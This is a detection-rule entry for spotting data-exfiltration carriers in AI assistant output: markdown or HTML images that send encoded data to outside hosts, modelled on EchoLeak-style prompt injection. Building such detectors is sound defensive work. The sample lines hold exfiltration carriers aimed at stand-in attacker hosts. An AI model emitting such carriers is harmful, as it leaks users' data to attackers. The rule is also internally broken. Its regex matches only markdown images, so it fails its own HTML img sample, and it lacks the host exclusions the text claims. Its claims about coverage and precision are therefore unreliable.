AI Data-Exfiltration Marker

Detects data-exfiltration carriers in AI/LLM output: markdown images or links and HTML img tags whose URL points off-tenant and carries an encoded data payload in the path or query. This is an EchoLeak-style (cf. CVE-2025-32711) generic markdown/HTML exfiltration-carrier marker - it flags the carrier shape, not the full CVE mechanism (which also involves XPIA evasion and a Teams proxy/CSP bypass).

Type: regex
Engine: universal
Confidence: high
Confidence justification: High/precision-gated: fires on outbound content, so tuned for low FP. Requires an external host plus a long encoded payload; corporate-host and test-text exclusions remove the named FP traps.
Jurisdictions: global
Regulations: OWASP LLM Top 10 2025, NIST AI RMF GenAI Profile
Frameworks: ISO 27001
Data categories: emerging, security
Risk rating: 9
Platform compatibility: Purview: Compatible, GCP DLP: Compatible, Macie: Compatible, Zscaler: Compatible, Palo Alto: Compatible, Netskope: Compatible

Pattern

!\[[^\]]*\]\(\s*https?://[^)\s]+[?#&][^)\s]*=[^)\s]{16,}\)

Corroborative evidence keywords

image, link, markdown, render, AI, artificial intelligence, LLM, large language model, Copilot, chatbot, assistant, agent, prompt, system prompt, tool call, completion, model

Proximity: 300 characters

Should match

![logo](https://evil.example.net/c?d=eyJzZWNyZXQiOiJsZWFrZWQtdmFsdWUtMTIzNDU2Nzg5In0) — Markdown image to external host with long base64-like query payload
<img src="https://attacker.test/p?x=QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo"> — HTML img tag to external host with encoded payload

Should not match

![logo](https://contoso.sharepoint.com/sites/team/logo.png) — SharePoint deep link (corporate host, no data payload)
![pixel](https://analytics.example.com/t?id=42) — Analytics URL with short, non-data parameter

Collections

AI Threat Classifiers